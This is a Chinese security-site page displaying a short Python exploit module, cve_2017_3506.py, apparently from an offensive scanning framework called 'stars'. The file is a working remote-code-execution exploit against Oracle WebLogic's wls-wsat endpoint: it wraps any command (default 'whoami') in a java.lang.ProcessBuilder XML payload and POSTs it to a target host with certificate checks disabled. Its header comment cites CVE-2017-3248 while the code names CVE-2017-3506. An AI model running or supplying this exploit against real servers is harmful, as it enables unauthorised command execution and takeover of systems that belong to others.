menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right stars chevron_right cve_2017_3506.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    cve_2017_3506.py
    1.46 KB / 2021-07-12 19:46:00
        #!/usr/bin/env python3
    # _*_ coding:utf-8 _*_
    # CVE-2017-3248
    # 该漏洞不会直接回显
    # updated 2019/11/1
    # by 0xn0ne
    
    from stars import universe, Star, target_type
    from utils import http
    
    
    @universe.groups()
    class CVE_2017_3506(Star):
        info = {
            'NAME': '',
            'CVE': 'CVE-2017-3506',
            'TAG': []
        }
        type = target_type.VULNERABILITY
    
        def light_up(self, dip, dport, cmd='whoami', *args, **kwargs) -> (bool, dict):
            url = 'http://{}:{}/wls-wsat/CoordinatorPortType'.format(dip, dport)
            data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java>
                <object class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="3">
                    '''
            for idx, it in enumerate(cmd.split()):
                data += '<void index="{}"><string>{}</string></void>'.format(idx, it)
            data += '''
                  </array>
                  <void method="start"/>
                </object>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>'''
    
            headers = {'Content-Type': 'text/xml'}
            res, data = http(url, 'POST', headers, data=data, verify=False)
            return res != None and ('<faultstring>java.lang.ProcessBuilder' in res.text or "<faultstring>0" in res.text), {
                'msg': 'finish.'}
    
    
    links
    file_download